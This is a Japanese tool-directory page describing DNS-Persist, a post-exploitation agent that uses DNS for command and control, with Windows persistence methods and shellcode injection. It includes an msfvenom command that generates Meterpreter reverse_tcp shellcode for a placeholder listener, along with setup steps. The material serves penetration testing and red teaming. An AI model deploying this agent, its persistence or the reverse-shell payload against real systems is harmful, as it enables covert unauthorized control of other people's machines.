Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
DNS-Persist — DNS-Persistは、DNSを使用してコマンド&コントロールを行うポストエクスプロイテーションエージェントです。 | Kitploit
ツール/GitHubGitHub/0x09al/dns-persist
ペイロード生成永続化メカニズムシェルコードポストエクスプロイトペネトレーションテストコマンド&コントロールレッドチーミングDNS分析
GitHub0x09al/dns-persist

DNS-Persist

DNS-Persistは、DNSを使用してコマンド&コントロールを行うポストエクスプロイテーションエージェントです。

リポジトリを見る
207638年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

DNS-Persist

DNS-Persist は、DNS をコマンド&コントロールに使用するポストエクスプロイテーションエージェントです。サーバーサイドのコードは Python で書かれており、エージェントは C++ でコーディングされています。これは最初のバージョンであり、今後さらに多くの機能と改善が追加される予定です。

はじめに

作者

0x09AL - https://twitter.com/0x09al

免責事項

このソフトウェアを違法な目的で使用しないでください。

著作者は、ここで提供されるコードの誤用について一切の責任を負いません。

車輪の再発明をしたのか?

DNS C2 に関する優れた成果は数多くありますが、私はこのソフトウェアを永続化の部分により重点を置いて作成しました。私は C++ の専門家ではなく、これが C++ で書いた最初の「本格的なプログラム」です(そのため、目を覆いたくなるようなコードもあるかもしれません)。

機能や改善に関する提案は歓迎します。

アーキテクチャ

主な構成要素は2つです:

  1. DNS サーバー
  2. エージェント

alt text

機能

永続化メカニズム

このバージョンには3つの永続化メカニズムしかありません。今後さらに追加される予定です。

  1. LogonScript による永続化。
  2. RunKey による永続化。
  3. Excel アドインによる永続化。

「対話型」コマンドシェル

このバージョンは、システムコマンドを実行するために使用できる擬似対話型コマンドシェルをサポートしています。

シェルコードインジェクション

このバージョンは32ビットシェルコードのインジェクションをサポートしています。シェルコードは同じプロセス内の新しいスレッドで実行されるため、クラッシュするシェルコードや無効なシェルコードはエージェントもクラッシュさせます。シェルコードに NULL バイトを含めないようにしてください。

シェルコード生成の例

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port EXITFUNC=thread -b "\x00" -f hex -o /tmp/shellcode.hex

TODO リスト

  1. 暗号化を追加する。 このバージョンには暗号化機能がないため、使用する際は自己責任でお願いします。
  2. 永続化メカニズムをさらに追加する。
  3. 異なるプログラミング言語でエージェントを実装する。

インストールと使用方法

サーバー側

root@kitploit:~
pip install dnslib
git clone https://github.com/0x09AL/DNS-Persist
python server.py

デフォルトでは、ポート53で DNS サーバーが起動します。これは server.py ファイル内で変更できます。

エージェント

エージェントのコーディングには Visual Studio 2010 を使用したため、インポートとコンパイルはかなり簡単なはずです。

自分のドメイン名に合わせて、Declarations.h 内の DOMAIN_NAME 変数を変更することを忘れないでください。

ドメインのネームサーバーは、DNS-Persist の IP アドレスを指すように設定する必要があります。

root@kitploit:~
#define DOMAIN_NAME "example.com"

スクリーンショット

  1. 図-1

alt text

  1. 図-2

alt text

  1. 図-3

alt text

  1. 図-4

alt text

ツールをダウンロード